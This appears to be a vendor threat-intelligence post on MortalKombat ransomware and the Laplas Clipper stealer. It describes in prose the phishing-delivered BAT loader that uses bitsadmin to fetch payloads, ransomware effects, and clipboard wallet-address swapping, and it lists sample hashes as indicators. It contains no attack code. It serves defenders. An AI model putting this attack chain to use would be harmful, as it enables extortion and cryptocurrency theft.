Related Families: Xorist, Laplas Clipper
Executive Summary
Cisco Talos recently reported on threat actor activity leveraging MortalKombat ransomware and Laplas Clipper. MortalKombat encrypts files on the infected machine and drops a ransom note instructing victims on how to pay the ransom to recover their files.
Key Takeaways
- Cisco Talos recently reported on threat actor activity leveraging MortalKombat ransomware and Laplas Clipper.
- The initial infection vector is cryptocurrency-themed phishing emails that lead to a multi-stage attack chain.
- MortalKombat encrypts files on the infected machine and drops a ransom note instructing victims on how to pay the ransom to recover their files.
Cisco Talos recently reported on threat actor activity leveraging MortalKombat ransomware and Laplas Clipper. According to researchers at Cisco Talos, the unidentified threat actor group responsible for the activity is financially motivated.
The initial infection vector is cryptocurrency-themed phishing emails that lead to a multi-stage attack chain. The phishing emails contain an attached ZIP file with a BAT loader script. When a victim opens the loader script, it uses the LoLBin bitsadmin to download another malicious ZIP file from an actor-controlled C2. The payload, which is either MortalKombat ransomware or the GO variant of Laplas Clipper, is automatically executed. Dropped payloads run as a process on the infected machine, then the loader script deletes the malicious files in an attempt to clean up infection markers.
What is MortalKombat?
MortalKombat is a novel ransomware family first discovered in January 2023. It is a 32-bit Windows executable. At this time, researchers have not identified the threat actors behind the malware. MortalKombat encrypts files on the infected machine and drops a ransom note instructing victims on how to pay the ransom to recover their files. Along with the ransom note, MortalKombat drops a wallpaper on the victim's machine with an image related to the video game Mortal Kombat. PolySwarm analysts were able to extract a copy of the MortalKombat ransom note. MortalKombat also corrupts Windows Explorer, removes startup applications and folders, and disables the Run command. The threat actors behind the attacks use qTOX messenger to communicate with victims. Cisco Talos researchers noted MortalKombat appears to belong to the Xorist malware family.
What is Laplas Clipper?
Laplas Clipper is a clipboard stealer first seen in the wild in late 2022. It is a 32-bit executable and is written in GO. It belongs to the Clipper malware family. Malware in this family is typically used to target cryptocurrency users. Laplas Clipper uses regex to monitor a victim’s clipboard for cryptocurrency wallet addresses. When a crypto wallet address is detected, the Clipper bot overwrites the victim’s clipboard and replaces the address with an actor-controlled wallet address, allowing threat actors to intercept cryptocurrency payments.
IOCs
PolySwarm has multiple samples of MortalKombat.
26d870d277e2eca955e51a8ea77d942ebafbbf3cbf29371a04a43cfe1546db17
9a5a5d50dea40645697fabc8168cc32faf8e71ca77a2ea3f5f73d1b9a57fc7b0
63ec10e267a71885089fe6de698d2730c5c7bc6541f40370680b86ab4581a47d
e5f60df786e9da9850b7f01480ebffced3be396618c230fa94b5cbc846723553
aab1afbc7706030c1b710c6ae0873fd22de1190604301d0df17e1acae972ef7c
1bf30c5c51a3533b4f0d7d3d560df691657d62374441d772f563376b55a60818
3234f21e5dd6fe1b3f5222213921b952c3e29b35daeccab38188e2ade17cb6e6
f02512e7e2950bdf5fa0cd6fa6b097f806e1b0f6a25538d3314c793998484220
You can use the following CLI command to search for all MortalKombat samples in our portal:
$ polyswarm link list -f MortalKombat
Don’t have a PolySwarm account? Go here to sign up for a free Community plan or to subscribe.
Contact us at hivemind@polyswarm.io | Check out our blog | Subscribe to our reports
